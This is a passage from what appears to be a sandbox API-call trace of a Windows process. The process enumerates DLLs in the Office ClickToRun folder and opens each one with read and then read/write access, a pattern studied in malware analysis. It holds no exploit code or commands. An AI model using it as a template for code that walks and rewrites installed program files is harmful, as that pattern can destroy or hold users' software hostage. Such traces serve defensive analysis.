dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0075.732] GetFileType (hFile=0x430) returned 0x1 [0075.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0075.732] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0075.732] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0075.732] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0075.732] CloseHandle (hObject=0x430) returned 1 [0075.732] AreFileApisANSI () returned 1 [0075.732] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0075.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x2e430 [0075.732] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream64.dll") returned 78 [0075.733] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream64.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0075.733] GetFileType (hFile=0x430) returned 0x1 [0075.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0075.733] CloseHandle (hObject=0x430) returned 1 [0075.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0075.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0075.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0075.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0075.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0075.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0075.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0075.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0075.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0075.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0075.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0075.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0075.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0075.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0075.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0075.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0075.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0075.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0075.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0075.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0075.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0075.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0075.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0075.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0075.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0075.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0075.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0075.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0075.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0075.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0075.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0075.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0075.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0075.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0075.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0075.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0075.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0075.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0075.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0075.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0075.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0075.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0075.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0075.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0075.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0075.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0075.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0075.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0075.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0075.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0075.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0075.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0075.734] AreFileApisANSI () returned 1 [0075.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0075.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x2e430 [0075.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream64.dll") returned 78 [0075.735] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream64.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a7f55d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a7f55d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xb5e67000, ftLastWriteTime.dwHighDateTime=0x1d0d7a8, nFileSizeHigh=0x0, nFileSizeLow=0x73aa0)) returned 1 [0075.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0075.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0075.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0075.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0075.735] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.735] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.735] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a7f55d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a7f55d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9cf13f00, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x336d8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppVIsvStreamingManager.dll", cAlternateFileName="APPVIS~4.DLL")) returned 1 [0075.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0075.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0075.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0075.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0075.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0075.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0075.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0075.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0075.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0075.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0075.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0075.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0075.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0075.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0075.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0075.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0075.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0075.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0075.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0075.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0075.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0075.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0075.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0075.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0075.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0075.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0075.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x80fc0 [0075.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0075.736] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.736] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.736] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.736] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80fc0 | out: hHeap=0x20000) returned 1 [0075.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0075.736] AreFileApisANSI () returned 1 [0075.736] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll", lpUsedDefaultChar=0x0) returned 86 [0075.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0075.736] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.736] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0075.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0075.736] AreFileApisANSI () returned 1 [0075.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 86 [0075.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xac) returned 0x81e20 [0075.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x81e20, cchWideChar=86 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll") returned 86 [0075.736] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstreamingmanager.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0075.736] GetFileType (hFile=0x430) returned 0x1 [0075.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81e20 | out: hHeap=0x20000) returned 1 [0075.737] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0075.737] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0075.737] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0075.737] CloseHandle (hObject=0x430) returned 1 [0075.737] AreFileApisANSI () returned 1 [0075.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 86 [0075.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xac) returned 0x81130 [0075.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x81130, cchWideChar=86 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll") returned 86 [0075.737] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstreamingmanager.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0075.738] GetLastError () returned 0x20 [0075.738] GetLastError () returned 0x20 [0075.738] SetLastError (dwErrCode=0x20) [0075.738] GetLastError () returned 0x20 [0075.738] SetLastError (dwErrCode=0x20) [0075.738] GetLastError () returned 0x20 [0075.738] SetLastError (dwErrCode=0x20) [0075.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81130 | out: hHeap=0x20000) returned 1 [0075.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0075.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0075.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0075.738] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.738] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.738] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80aa57b9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80aa57b9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9cf13f00, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x1566d8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppVIsvSubsystemController.dll", cAlternateFileName="AP213A~1.DLL")) returned 1 [0075.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0075.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0075.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0075.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0075.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0075.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0075.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0075.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0075.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0075.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0075.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0075.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0075.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0075.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0075.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0075.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0075.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0075.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0075.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0075.739] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0075.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0075.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0075.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0075.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x5a6b8 [0075.739] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0075.739] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0075.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x51398 [0075.739] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0075.739] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.739] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.739] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.739] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.739] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0075.739] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0075.739] AreFileApisANSI () returned 1 [0075.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll", lpUsedDefaultChar=0x0) returned 89 [0075.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0075.739] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.739] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0075.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0075.739] AreFileApisANSI () returned 1 [0075.739] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 89 [0075.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x5a6b8 [0075.739] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=89 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll") returned 89 [0075.739] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystemcontroller.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0075.740] GetFileType (hFile=0x430) returned 0x1 [0075.740] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0075.740] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0075.740] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0075.740] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0075.740] CloseHandle (hObject=0x430) returned 1 [0075.740] AreFileApisANSI () returned 1 [0075.740] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 89 [0075.740] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x5a6b8 [0075.740] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=89 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll") returned 89 [0075.741] CreateFileW 